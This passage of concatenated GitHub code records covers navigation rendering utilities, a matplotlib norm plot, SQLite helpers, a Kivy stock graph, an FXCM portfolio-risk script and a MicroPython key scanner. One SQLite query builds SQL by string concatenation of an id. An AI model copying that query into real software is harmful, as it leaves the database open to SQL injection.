+ suggested_interval\n\n if ind < len(models_paths):\n return models_paths[ind], ind\n elif ind == max_ckpts and len(models_paths) == max_ckpts:\n return models_paths[-1], len(models_paths) - 1\n\n return None, previous_ckpt_ind\n\n\ndef observations_to_image(observation: Dict, info: Dict) -> np.ndarray:\n r\"\"\"Generate image of single frame from observation and info\n returned from a single environment step().\n Args:\n observation: observation returned from an environment step().\n info: info returned from an environment step().\n Returns:\n generated image of a single frame.\n \"\"\"\n render_obs_images: List[np.ndarray] = []\n for sensor_name in observation:\n if \"rgb\" in sensor_name:\n rgb = observation[sensor_name]\n if not isinstance(rgb, np.ndarray):\n rgb = rgb.cpu().numpy()\n\n render_obs_images.append(rgb)\n elif \"depth\" in sensor_name:\n depth_map = observation[sensor_name].squeeze() * 255.0\n if not isinstance(depth_map, np.ndarray):\n depth_map = depth_map.cpu().numpy()\n\n depth_map = depth_map.astype(np.uint8)\n depth_map = np.stack([depth_map for _ in range(3)], axis=2)\n render_obs_images.append(depth_map)\n\n # add image goal if observation has image_goal info\n if \"imagegoal\" in observation or \"imagegoalrotation\" in observation:\n if \"imagegoal\" in observation:\n rgb = observation[\"imagegoal\"]\n else:\n rgb = observation[\"imagegoalrotation\"]\n if not isinstance(rgb, np.ndarray):\n rgb = rgb.cpu().numpy()\n\n render_obs_images.append(rgb)\n\n assert (\n len(render_obs_images) > 0\n ), \"Expected at least one visual sensor enabled.\"\n\n shapes_are_equal = len(set(x.shape for x in render_obs_images)) == 1\n if not shapes_are_equal:\n render_frame = tile_images(render_obs_images)\n else:\n render_frame = np.concatenate(render_obs_images, axis=1)\n\n # draw collision\n if \"collisions\" in info and info[\"collisions\"][\"is_collision\"]:\n render_frame = draw_collision(render_frame)\n\n if \"top_down_map\" in info:\n top_down_map = maps.colorize_draw_agent_and_fit_to_height(\n info[\"top_down_map\"], render_frame.shape[0]\n )\n render_frame = np.concatenate((render_frame, top_down_map), axis=1)\n return render_frame\n\n\ndef generate_video(\n video_option: List[str],\n video_dir: Optional[str],\n images: List[np.ndarray],\n episode_id: Union[int, str],\n checkpoint_idx: int,\n metrics: Dict[str, float],\n fps: int = 10,\n verbose: bool = True,\n) -> None:\n r\"\"\"Generate video according to specified information.\n Args:\n video_option: string list of \"tensorboard\" or \"disk\" or both.\n video_dir: path to target video directory.\n images: list of images to be converted to video.\n episode_id: episode id for video naming.\n checkpoint_idx: checkpoint index for video naming.\n metric_name: name of the performance metric, e.g. \"spl\".\n metric_value: value of metric.\n tb_writer: tensorboard writer object for uploading video.\n fps: fps for generated video.\n Returns:\n None\n \"\"\"\n if len(images) < 1:\n return\n\n metric_strs = []\n for k, v in metrics.items():\n metric_strs.append(f\"{k}={v:.2f}\")\n\n video_name = f\"episode={episode_id}-ckpt={checkpoint_idx}-\" + \"-\".join(\n metric_strs\n )\n if \"disk\" in video_option:\n assert video_dir is not None\n images_to_video(images, video_dir, video_name, verbose=verbose)\n if \"wandb\" in video_option:\n images = np.array(images)\n images = images.transpose(0, 3, 1, 2)\n wandb.log({f\"episode{episode_id}_{checkpoint_idx}\": wandb.Video(images, fps=fps)})\n\n\ndef add_info_to_image(frame, info):\n string = \"d2g: {} | a2g: {} |\\nsimple reward: {} |\\nsuccess: {} | angle success: {}\".format(\n round(info[\"distance_to_goal\"], 3),\n round(info[\"angle_to_goal\"], 3),\n round(info[\"simple_reward\"], 3),\n round(info[\"success\"], 3),\n round(info[\"angle_success\"], 3),\n )\n # frame = append_text_to_image(frame, string)\n return frame\n","repo_name":"pranav-putta/lm-nav","sub_path":"lmnav/emb_transfer/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":13543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43312258175","text":"\r\n###############\r\n# Authored by Weisheng Jiang\r\n# Book 3 | From Basic Arithmetic to Machine Learning\r\n# Published and copyrighted by Tsinghua University Press\r\n# Beijing, China, 2022\r\n###############\r\n\r\n# Bk3_Ch9_04\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\na = 1;\r\nb = 1;\r\n\r\np = [0.5,1,2,3]\r\nq = p\r\n\r\npp,qq = np.meshgrid(p,q)\r\npp = pp.flatten()\r\nqq = qq.flatten()\r\n\r\nx1 = np.linspace(-2, 2, num=101);\r\nx2 = x1;\r\n\r\nxx1, xx2 = np.meshgrid(x1,x2)\r\n\r\nfig, axes = plt.subplots(ncols=4,nrows=4,\r\n figsize=(12, 12))\r\n\r\nfor p, q, ax in zip(pp, qq, axes.flat):\r\n \r\n if np.isinf(p):\r\n zz = np.maximum(np.abs(xx1/a),np.abs(xx2/b))\r\n else:\r\n zz = ((np.abs((xx1/a))**p) + (np.abs((xx2/b))**q))**(1./q)\r\n \r\n # plot contour of Lp\r\n ax.contourf(xx1, xx2, zz, 20, cmap='RdYlBu_r')\r\n \r\n # plot contour of Lp = 1\r\n ax.contour (xx1, xx2, zz, [1], colors='k', linewidths = 2) \r\n \r\n # decorations\r\n\r\n ax.axhline(y=0, color='k', linewidth = 0.25)\r\n ax.axvline(x=0, color='k', linewidth = 0.25)\r\n ax.set_xlim(-2, 2)\r\n ax.set_ylim(-2, 2)\r\n ax.spines['top'].set_visible(False)\r\n ax.spines['right'].set_visible(False)\r\n ax.spines['bottom'].set_visible(False)\r\n ax.spines['left'].set_visible(False)\r\n ax.set_xlabel('$x_1$')\r\n ax.set_ylabel('$x_2$')\r\n ax.set_title('p = ' + str(p) + 'q = ' + str(q))\r\n ax.set_aspect('equal', adjustable='box')\r\n\r\nplt.show()\r\n","repo_name":"Visualize-ML/Book3_Elements-of-Mathematics","sub_path":"Book3_Ch09_Python_Codes/Bk3_Ch9_04.py","file_name":"Bk3_Ch9_04.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":4864,"dataset":"github-code","pt":"31"} +{"seq_id":"28331524440","text":"\nimport sqlite3 as sql\nimport logging\nspeedrunner_log = logging.getLogger(__name__)\n\ndef get_categories_by_game_id(con, game_id):\n cur = con.cursor()\n rows = cur.execute(\"SELECT category_id FROM GamesCategories WHERE game_id = '\" + str(game_id) + \"' ORDER BY category_id DESC\").fetchall()\n return [category_id[0] for category_id in rows]\n\ndef add_game_category_by_id(con, game_id, category_id):\n cur = con.cursor()\n cur.execute(\"INSERT OR IGNORE INTO GamesCategories VALUES (?, ?, ?)\", (None, game_id, category_id) )\n con.commit()\n return cur.lastrowid\n\ndef add_game_categories_by_id(con, game_id, category_ids):\n speedrunner_log.info('Adding categories for game_id ' + str(game_id) + ': ' + str(category_ids))\n\n entries = []\n for id in category_ids:\n entries.append((None, game_id, id))\n\n cur = con.cursor()\n cur.executemany(\"INSERT OR IGNORE INTO GamesCategories VALUES (?, ?, ?)\", entries )\n con.commit()","repo_name":"jstrub3/speedrunner","sub_path":"db_games_categories.py","file_name":"db_games_categories.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"19718434959","text":"# import pickle\n# with open(\"model.pkl\",\"rb\") as f:\n# p=pickle.load(f)\n# f.close()\n# print(\"predicted stock market price of year are:\",p.predict([[2901]]))\n\n# importing pyplot for graph plotting\nfrom matplotlib import pyplot as plt\nimport pickle\n\n# importing numpy\nimport pandas as pd\nimport numpy as np\nfrom kivy.garden.matplotlib import FigureCanvasKivyAgg\n\n# importing kivyapp\nfrom kivymd.uix.screen import MDScreen\n\n\n# importing kivy builder\nfrom kivy.lang import Builder\nimport kivy.garden.matplotlib\n\n\n\n# this is the main class which will\n# render the whole application\nclass Graph(MDScreen):\n\n\tdef __init__(self,string,result):\n\t\tstring=int(string)\n\t\tresult=int(float(result))\n\t\ty1,y2=2000,3000\n\t\tself.str = Builder.load_string(\"\"\"\nMDScreen:\n MDBoxLayout:\n layout:layout\n size_hint:(0.8,0.8)\n pos_hint:{\"center_x\":0.5,\"center_y\":0.5}\n BoxLayout:\n \n id:layout\n\tMDFillRoundFlatButton:\n text: \"Check\"\n md_bg_color: (233/255, 59/255, 129/255,0.5)\n pos_hint:{\"center_x\":0.9,\"center_y\":0.9}\n on_release:app.change_screen1()\n \n\t\t\t\t\t\t\t\t\"\"\")\n\t\tdf=pd.read_csv(\"stock_market.csv\")\n\n\t\timport matplotlib.dates as mdates\n\t\tyears = mdates.YearLocator() # Get every year\n\t\tyearsFmt = mdates.DateFormatter('%Y') # Set year format\n\t\tfig,ax= plt.subplots()# Create subplots to plot graph and control axes\n\t\tax.plot(df['Date'], df['Close'])\n\t\t# Format the ticks\n\t\tax.xaxis.set_major_locator(years)\n\t\tax.xaxis.set_major_formatter(yearsFmt)\n\n\t\tplt.title('Close Stock Price History')\n\t\tplt.xlabel('Date')\n\t\tplt.ylabel('Closing Stock Price in $')\n\t\tif y1>string :\n\t\t\ty1=string/2\n\t\t\ty2=string*2\n\t\telif y2= 1.25: print(\"*** VIX TERM STRUTURE IN HEIGH CONTAGO ***\")\r\n if vol['vix_term_ema'].ix[-1] <= 1.10: print(\"*** INVERTED VIX TERM STRUCTURE ***\")\r\n \r\n return vol\r\n\r\nvol = vol_model()\r\n\r\n\r\ndef exp_data(loc = 'gdrive'):\r\n 'excel', 'gdrive'\r\n if loc == 'excel':\r\n writer = ExcelWriter(\"/home/rem/Documents/FXCM Trading (Dropbox)/PyData.xlsx\")\r\n pr_instr.to_excel(writer, 'Sheet1')\r\n pr_factors.to_excel(writer, 'Sheet2')\r\n ewma_corr_instr.to_excel(writer, 'Sheet3')\r\n ewma_cov_instr.to_excel(writer, 'Sheet4')\r\n vol.to_excel(writer, 'Sheet5')\r\n ewma_cov_fact.to_excel(writer, 'Sheet6')\r\n writer.save()\r\n if loc == 'gdrive':\r\n d2g.upload(pr_instr, gfile='/Trading FXCM/PyData', wks_name='pr_instr')\r\n d2g.upload(pr_factors, gfile='/Trading FXCM/PyData', wks_name='pr_factors')\r\n d2g.upload(ewma_corr_instr, gfile='/Trading FXCM/PyData', wks_name='corr_instr')\r\n d2g.upload(ewma_cov_instr, gfile='/Trading FXCM/PyData', wks_name='cov_instr')\r\n d2g.upload(ewma_cov_fact, gfile='/Trading FXCM/PyData', wks_name='cov_fact')\r\n return\r\n\r\nexp_data()\r\n\r\n\r\n#==============================================================================\r\n# Till here just once a day\r\n# From here variable part\r\n#==============================================================================\r\n\r\n\r\n#====================\r\n# WEIGHTS\r\n#====================\r\ndef get_weights(loc = 'cloud'):\r\n 'local', 'cloud' \r\n if loc == 'local': \r\n weights = pd.read_excel('/home/rem/Documents/FXCM Trading (Dropbox)/Weights.xlsx', sheetname='Weights', index_col=0)\r\n if loc == 'cloud':\r\n #weights = pd.read_excel(\"https://1drv.ms/x/s!ApHwtSabAP46itkDw2YNwQHNAzCM4A\", sheetname='Weights', index_col=0)\r\n weights = g2d.download(gfile=\"1bmy2DLu5NV5IP-mo9rGWOyHOx7bEfoglVZmzzuHi5zc\", wks_name=\"Weights\", col_names=True, row_names=True, credentials=None, start_cell='A1')\r\n #print('\\n', 'Weights\\n', weights, '\\n', '\\n')\r\n weights = weights.apply(pd.to_numeric, errors='ignore')\r\n return weights\r\n\r\n#weights = get_weights()\r\n\r\n\r\n#====================\r\n# PORTFOLIO RISK\r\n#====================\r\n# To-do: add mean-var optimization\r\ndef portf_risk():\r\n weights = get_weights()\r\n\r\n # VaR single instruments \r\n VaR_single = 1.645 * ewma_std_instr/100 * abs(weights.NOTIONAL)\r\n VaR_single = np.round(VaR_single, 0)\r\n #print('\\n', \"VaR\\n\", VaR, '\\n')\r\n\r\n # Portfolio expected ret. and vol. \r\n port_expRet = round(np.asscalar(np.dot(ewma_rt_instr.transpose(), weights[[0]])), 1)\r\n port_std = np.dot(np.transpose(np.dot(ewma_cov_instr, weights[[0]])), weights[[0]])\r\n port_std = np.asscalar(np.round(100*port_std**0.5, 1))\r\n port_vol = round(port_std*252**0.5)\r\n #print('\\n', \"Portfolio Risk\\n\", '\\n')\r\n #print(\"Port. Exp. Ret.=\", \"%.1f%%\" % port_expRet, ' ', 'Port. Std. Dev.=', \"%.1f%%\" % port_std, ' ', 'Port. Vol.=', \"%.0f%%\" % port_vol, '\\n')\r\n\r\n # Betas of Instruments\r\n var = pd.DataFrame.ewm(rt_instr/100, span=32).var().dropna()['SPX500']\r\n var = np.around(var, 5)\r\n cov = pd.DataFrame.ewm(rt_instr/100, span=32).cov().dropna()\r\n cov = cov.xs(key='SPX500', axis=1).transpose()\r\n cov = np.around(cov, 5)\r\n beta = np.around(cov.div(var, axis='index'), 1)\r\n #print('\\n', 'Instruments Beta\\n', beta.iloc[[-1]], '\\n')\r\n #beta.plot(subplots=True, title=\"INSTRUMENTS BETAS\", layout=(5, 3), figsize=(15, 10), sharex=False) ;\r\n\r\n return (VaR_single, port_expRet, port_std, port_vol, beta.iloc[[-1]], beta) \r\n\r\n#VaR, port_expRet, port_std, port_vol, beta_last, beta = portf_risk()\r\n\r\n\r\n#====================\r\n# FACTOR MODEL\r\n#====================\r\n# Simulated Historical Returns (sim_NAV)\r\n# (This is essentialy a backtest)\r\ndef get_fact_data():\r\n weights = get_weights()\r\n R = rt_instr\r\n W = weights.WEIGHTS\r\n\r\n # Sumproduct\r\n S = R.apply(lambda x: np.asarray(x) * np.asarray(W), axis=1) \r\n S['rt_sim'] = np.round(S.sum(axis=1), 1)\r\n sim_NAV = S['rt_sim']\r\n # Returns\r\n rt_fact_mod = rt_fact.join(sim_NAV) \r\n ewma_rt_fact_mod = np.round(pd.DataFrame.ewm(rt_fact_mod, span=5).mean(), 1)\r\n ewma_rt_fact_mod.rename(columns={'rt_sim':'ewma_sim_NAV'}, inplace=True)\r\n # reordering\r\n ewma_rt_fact_mod = ewma_rt_fact_mod[['ewma_sim_NAV', 'SPY', 'DBP', 'JJC', 'USO', 'UNG', 'UUP', 'FXY']] \r\n #scatter_matrix(factors, alpha=0.8, diagonal='kde') ;\r\n #print('\\n', 'Factors\\n', ewma_rt_fact_mod.tail(2), '\\n') \r\n return (rt_fact_mod, sim_NAV, ewma_rt_fact_mod.tail(71))\r\n\r\n#rt_fact_mod, sim_NAV, ewma_rt_fact_mod = get_fact_data()\r\n\r\n\r\ndef fact_model():\r\n rt_fact_mod, sim_NAV, ewma_rt_fact_mod = get_fact_data()\r\n\r\n # Betas of Factors (exp. weighted)\r\n varf = np.round(pd.DataFrame.ewm(rt_fact/100, span=32).var().dropna(), 5)\r\n covf = pd.DataFrame.ewm(rt_fact_mod/100, span=32).cov().dropna()\r\n covf = covf.xs(key='rt_sim', axis=1).transpose()\r\n betaf=pd.DataFrame([covf.SPY/varf.SPY, covf.DBP/varf.DBP, covf.JJC/varf.JJC, covf.USO/varf.USO, covf.UNG/varf.UNG, covf.UUP/varf.UUP, covf.FXY/varf.FXY]).transpose()\r\n betaf = np.round(betaf, 1)\r\n #print('Factors Beta\\n', betaf.iloc[[-1]])\r\n #betaf.plot(subplots=True, title=\"FACTORS BETAS\", layout=(5, 3), figsize=(15, 10), sharex=False) ;\r\n\r\n # Slopes from OLS\r\n fact_mod = ols(formula=\"ewma_sim_NAV~SPY+DBP+JJC+USO+UNG+UUP+FXY\", data=ewma_rt_fact_mod).fit()\r\n #print('\\n', 'Slopes\\n', np.round(fact_mod.params, 1), '\\n')\r\n #print('MSE\\n', np.round(fact_mod.mse_resid, 2))\r\n #print('\\n', 'Factor Model\\n', fact_mod.summary(), '\\n', '\\n')\r\n #fig = plt.figure(figsize=(12,8))\r\n #fig = sm.graphics.plot_partregress_grid(fact_mod, fig=fig)\r\n \r\n # Fact. Model expected ret. and vol.\r\n factMod_expRet = round(np.asscalar(np.dot(ewma_rt_fact.iloc[[-1]], betaf.iloc[[-1]].transpose())+fact_mod.params[0]), 1)\r\n factMod_std = np.dot(betaf.iloc[[-1]], (np.dot(ewma_cov_fact, betaf.iloc[[-1]].transpose())))\r\n factMod_std = np.asscalar(np.round(100*factMod_std**0.5, 1))\r\n #factMod_std = np.round(factMod_std+fact_mod.mse_resid, 1)\r\n factMod_vol = round(factMod_std*252**0.5)\r\n #print(\"Factor Model\\n\")\r\n #print(\"Exp. Ret.=\", \"%.1f%%\" % factMod_expRet, ' ', 'Std. Dev.=', \"%.1f%%\" % factMod_std, ' ', 'Vol.=', \"%.0f%%\" % factMod_vol, ' ', 'Id. Risk=', \"%.1f%%\" % fact_mod.mse_resid, '\\n', '\\n')\r\n\r\n return (betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol)\r\n\r\n#betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol = fact_model()\r\n\r\n\r\n#====================\r\n# VALUE AT RISK\r\n#====================\r\ndef VaR(returns, alpha = 0.05):\r\n weights = get_weights()\r\n factMod_std = fact_model()[3]\r\n sim_NAV = get_fact_data()[1]\r\n returns = sim_NAV\r\n \r\n # VaR from factor model\r\n var_fact = np.round(1.645*factMod_std/100*weights.EQUITY[0], 0) \r\n\r\n # Historical simulation var\r\n sorted_returns = np.sort(returns)\r\n # Calculate the index associated with alpha\r\n index = int(alpha * len(sorted_returns))\r\n # VaR should be positive\r\n var_hist = np.round(abs(sorted_returns[index])/100*weights.EQUITY[0], 0)\r\n\r\n # CVar Conditional VaR of the returns\r\n # Calculate the total VaR beyond alpha\r\n sum_var = sorted_returns[0]\r\n for i in range(1, index):\r\n sum_var += sorted_returns[i]\r\n # CVaR return the average VaR (should be positive)\r\n cvar_hist = np.round(abs(sum_var/index)/100*weights.EQUITY[0], 0)\r\n #print('\\n', 'VaR (fact.):', var_fact, ' ', 'VaR (hist.):', var_hist, ' ', 'CVaR (hist.):', cvar_hist)\r\n\r\n return (var_fact, var_hist, cvar_hist) \r\n\r\n\r\n\r\n#====================\r\n# STRESS TEST\r\n#====================\r\ndef stress_test(event = 'none', compare = 'SPY', alpha = 0.05):\r\n start = ''\r\n end = ''\r\n \r\n pr = pd.read_csv(\"/home/rem/Documents/FXCM Trading (Dropbox)/Stress Test Data.csv\", index_col=0)\r\n \r\n log_pr = np.log(pr)\r\n log_rt = np.around(log_pr.diff()*100, 1)\r\n log_rt = log_rt.drop(log_rt.index[0]).fillna(0)\r\n\r\n # Events\r\n if event == 'us':\r\n log_rt = log_rt.ix['2011-07-01':'2011-12-30']\r\n pr = pr.ix['2011-07-01':'2011-12-30']\r\n start = datetime.date(2011,7,1)\r\n end = datetime.date(2011,12,30)\r\n event_name = 'US DOWNGRADE'\r\n elif event == 'ch':\r\n log_rt = log_rt.ix['2015-08-01':'2016-04-29'] \r\n pr =pr.ix['2015-08-01':'2016-04-29']\r\n start = datetime.date(2015,8,1)\r\n end = datetime.date(2016,4,29)\r\n event_name = 'CHINA DEVALUATION'\r\n elif event == 'br':\r\n log_rt = log_rt.ix['2016-06-01':'2016-07-15'] \r\n pr = pr.ix['2016-06-01':'2016-07-15']\r\n start = datetime.date(2016,6,1)\r\n end = datetime.date(2016,7,15)\r\n event_name = 'BREXIT'\r\n elif event == 'all':\r\n log_rt1= log_rt.ix['2011-07-01':'2012-03-30']\r\n log_rt2 = log_rt.ix['2015-08-01':'2016-04-29']\r\n log_rt3 = log_rt.ix['2016-06-01':'2016-07-15'] \r\n log_rt = pd.concat([log_rt1, log_rt2, log_rt3])\r\n pr1 = pr.ix['2011-07-01':'2012-03-30']\r\n pr2 =pr.ix['2015-08-01':'2016-04-29']\r\n pr3 = pr.ix['2016-06-01':'2016-07-15']\r\n pr = pd.concat([pr1, pr2, pr3])\r\n start = datetime.date(2011,7,1)\r\n end = datetime.date(2016,7,15)\r\n event_name = 'ALL'\r\n elif event == 'none':\r\n print('No event selected\\n Options: US Downgrade (us), China Devaluation (ch), Brexit (br), all (all)', '\\n')\r\n return\r\n \r\n weights = g2d.download(gfile=\"1bmy2DLu5NV5IP-mo9rGWOyHOx7bEfoglVZmzzuHi5zc\", wks_name=\"Weights\", col_names=True, row_names=True, credentials=None, start_cell='A1')\r\n weights = weights.apply(pd.to_numeric, errors='ignore')\r\n\r\n R = log_rt\r\n W = weights.WEIGHTS\r\n # T-do: Rename Z to rt_NAV \r\n S = R.apply(lambda x: np.asarray(x) * np.asarray(W), axis=1) \r\n S['rt_hist'] = np.round(S.sum(axis=1), 1) \r\n \r\n returns = S.rt_hist\r\n sorted_returns = np.sort(returns)\r\n index = int(alpha * len(sorted_returns))\r\n var_stress = np.round(abs(sorted_returns[index])/100*weights.EQUITY[0], 0)\r\n sum_var = sorted_returns[0]\r\n for i in range(1, index):\r\n sum_var += sorted_returns[i]\r\n cvar_stress = np.round(abs(sum_var/index)/100*weights.EQUITY[0], 0)\r\n \r\n # Plot\r\n compare\r\n pr['Portfolio'] = S.rt_hist.cumsum()\r\n pr[[compare, 'Portfolio']].plot(subplots=True, title=event_name, layout=(2, 1), figsize=(10, 5), sharex=True) ;\r\n \r\n print('\\n', 'Stress Test from', start, 'to', end, ' ', '***',event_name,'***', '\\n')\r\n print('VaR (Stress.):', var_stress, ' ', 'CVaR (Stress.):', cvar_stress, '\\n')\r\n\r\n return #(var_stress, cvar_stress) \r\n\r\n\r\n\r\n#====================\r\n# RISK SUMMARY\r\n#====================\r\ndef risk_data():\r\n #get_weights()\r\n weights = get_weights()\r\n \r\n #portf_risk()\r\n VaR_single, port_expRet, port_std, port_vol, beta_last, beta = portf_risk()\r\n \r\n #get_fact_data()\r\n rt_fact_mod, sim_NAV, ewma_rt_fact_mod = get_fact_data()\r\n\r\n #fact_model()\r\n betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol = fact_model()\r\n\r\n #VaR(returns=sim_NAV) \r\n var_fact, var_hist, cvar_hist = VaR(returns=sim_NAV)\r\n\r\n return (weights, VaR_single, port_expRet, port_std, port_vol, beta_last, beta, rt_fact_mod, sim_NAV, ewma_rt_fact_mod, betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol, var_fact, var_hist, cvar_hist)\r\n\r\n#weights, VaR, port_expRet, port_std, port_vol, beta_last, beta, rt_fact_mod, sim_NAV, ewma_rt_fact_mod, betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol = risk_data()\r\n\r\n\r\ndef risk_summary(plots = False, stress = 'none', ols = False):\r\n risk_data() \r\n weights, VaR_single, port_expRet, port_std, port_vol, beta_last, beta, rt_fact_mod, sim_NAV, ewma_rt_fact_mod, betaf, fact_mod, factMod_expRet, factMod_std, factMod_vol, var_fact, var_hist, cvar_hist = risk_data()\r\n \r\n print('\\n', '\\n', ' ', 'RISK SUMMARY FOR', datetime.datetime.now().replace(microsecond=0), '\\n', '\\n')\r\n print('WEIGHTS\\n', weights, '\\n', '\\n') \r\n print('SINGLE POSITIONS VALUE AT RISK\\n', '\\n', VaR_single, '\\n', '\\n')\r\n VaR_lim = VaR_single.loc[:, (VaR_single >= 100).any(axis=0)]\r\n print('*** ALERT: POSITIONS EXCEEDING VaR LIMITS ***\\n', '\\n', VaR_lim, '\\n', '\\n', '\\n')\r\n print('PORTFOLIO RISK\\n')\r\n print('Port. Exp. Ret.=', \"%.1f%%\" % port_expRet, ' ', 'Port. Std. Dev.=', \"%.1f%%\" % port_std, ' ', 'Port. Vol.=', \"%.0f%%\" % port_vol, '\\n', '\\n')\r\n print('FACTOR MODEL\\n')\r\n print('Exp. Ret.=', \"%.1f%%\" % factMod_expRet, ' ', 'Std. Dev.=', \"%.1f%%\" % factMod_std, ' ', 'Vol.=', \"%.0f%%\" % factMod_vol, ' ', 'Id. Risk=', \"%.1f%%\" % fact_mod.mse_resid, '\\n', '\\n', '\\n')\r\n if port_std >= 5:\r\n print('*** ALERT: DAILY VOLATILITY EXCEEDING LIMIT ***', '\\n', '\\n', '\\n')\r\n print('INSTRUMENTS BETA\\n', '\\n', beta_last, '\\n', '\\n')\r\n print('FACTORS BETA\\n', '\\n', betaf.iloc[[-1]], '\\n', '\\n', '\\n')\r\n print('PORTFOLIO VALUE AT RISK\\n', '\\n', 'VaR (factors):', var_fact, ' ', 'VaR (hist.):', var_hist, ' ', 'CVaR (hist.):', cvar_hist, '\\n', '\\n')\r\n if (var_fact or var_hist) > 800:\r\n print('*** ALERT: PORTFOLIO VaR TOO HIGH ***', '\\n', '\\n')\r\n \r\n # Plots\r\n if plots == True:\r\n beta.tail(100).plot(subplots=True, title=\"INSTRUMENTS BETAS\", layout=(7, 3), figsize=(15, 20), sharex=True) ;\r\n betaf.tail(100).plot(title=\"FACTORS BETAS\", figsize=(15,10)) \r\n #betaf.tail(100).plot(subplots=True, title=\"FACTORS BETAS\", layout=(5, 3), figsize=(15, 10), sharex=True) ;\r\n fig = plt.figure(figsize=(12,10))\r\n fig = sm.graphics.plot_partregress_grid(fact_mod, fig=fig)\r\n \r\n #OLS Summary \r\n if ols == True: \r\n print('\\n', 'Factors Regression\\n', fact_mod.summary(), '\\n', '\\n', '\\n')\r\n\r\n #Stress Test\r\n stress \r\n if stress != 'all':\r\n stress_test(event=stress)\r\n return\r\n # if stress == 'us':\r\n # stress_test(event='us', compare='SPY') \r\n # elif stress == 'ch':\r\n # stress_test(event='ch', compare='SPY') \r\n # elif stress == 'br':\r\n # stress_test(event='br', compare='SPY') \r\n elif stress == 'all':\r\n stress_test(event='us')\r\n stress_test(event='ch') \r\n stress_test(event='br')\r\n return\r\n elif stress == 'none':\r\n print('No Stress-Test selected\\n Options: US Downgrade (us), China Devaluation (ch), Brexit (br), all (all)', '\\n', '\\n')\r\n \r\n return\r\n","repo_name":"Karagul/FXCM-Trading","sub_path":"Trading FXCM - Risk.py","file_name":"Trading FXCM - Risk.py","file_ext":"py","file_size_in_byte":21669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39230861229","text":"# -*- coding:UTF-8 -*-\r\n\r\n'''\r\nMIT License\r\nCopyright (c) 2018 Robin Chen\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n'''\r\n\r\n'''\r\n******************************************************************************\r\n* 文 件:keyboard.py\r\n* 概 述:识别单个机械按键的单击、连击(暂未限制连击次数)、长按、短按动作,并返回事件。\r\n* 版 本:V0.10\r\n* 作 者:Robin Chen\r\n* 日 期:2018年7月26日\r\n* 历 史: 日期 编辑 版本 记录\r\n 2018年7月26日 Robin Chen V0.10 创建文件\r\n`\r\n******************************************************************************'''\r\nclass KEYBOARD:\r\n cont = 0\r\n def __init__(self, _btnKey, _tmBtn, _btnDef = 1, even_djlong = None, even_lj = None, _pull = None):\r\n self.btn = _btnKey\r\n if _pull == \"UP\":\r\n self.btn.init(_btnKey.IN, _btnKey.PULL_UP)\r\n elif _pull == \"DOWN\":\r\n self.btn.init(_btnKey.IN, _btnKey.PULL_DOWN)\r\n else:\r\n self.btn.init(_btnKey.IN)\r\n self.btnDef = _btnDef\r\n self.eve_btnLon = even_djlong\r\n self.evn_Continuous_Clicks = even_lj\r\n self.btnLabDown = 0 # 按钮扫描记次,按下状态\r\n self.btnLabUp = 0 # 按钮扫描记次,弹起状态\r\n self.Continuous_Clicks = 0 # 连续点击次数\r\n self.clock = 10 # 定时器时钟,单位毫秒\r\n _tmBtn.init(freq = (1000 / self.clock))\r\n _tmBtn.callback(self.doBtnScan)\r\n self.staLon = 1 # 长按标志字,1:长按计时,0:长按计次\r\n self.tLon = 3000 # 计时或计次延时,单位毫秒\r\n self.TIME_CONT_CLICKS = 50 # 连击时间间隔,按下和松开的状态保持时间长度,单位,次\r\n\r\n '''*************************************************************************\r\n * 功 能:按键扫描\r\n * 说 明:定时器回调函数,用于识别当前按键是否动作,并判断其动作形式。\r\n * 输入参数:\r\n t : 定时器无参回调函数必备,否则调用不成功。\r\n * 输出参数:None\r\n * 返 回 值:True\r\n **************************************************************************'''\r\n # 扫描按键,定时中断调用函数\r\n def doBtnScan(self, t):\r\n global cont\r\n self.btnLabUp = (self.btnLabUp * int(not(self.btn.value() ^ int(not(self.btnDef))))) + int(not(self.btn.value() ^ int(not(self.btnDef))))\r\n btdown = self.btnLabDown\r\n self.btnLabDown = (self.btnLabDown * int(not(self.btn.value() ^ self.btnDef))) + int(not(self.btn.value() ^ self.btnDef))\r\n\r\n # 长按计时/计次\r\n # t1:按键保持按下的时长\r\n if (self.btnLabDown * self.clock) == self.tLon:\r\n if self.staLon == 1:\r\n if self.eve_btnLon != None:\r\n self.eve_btnLon() # 按键长按事件,请勿在事件中执行过长时间的程序,否则会报定时器错误。\r\n elif self.staLon == 0:\r\n if self.eve_btnLon != None:\r\n cont += 1\r\n self.eve_btnLon(cont) # 按键长按事件,请勿在事件中执行过长时间的程序,否则会报定时器错误。\r\n self.btnLabDown = 0\r\n if self.btnLabUp > 5:\r\n cont = 0\r\n\r\n # 连续点击\r\n if (btdown > 5 and btdown < self.TIME_CONT_CLICKS) and 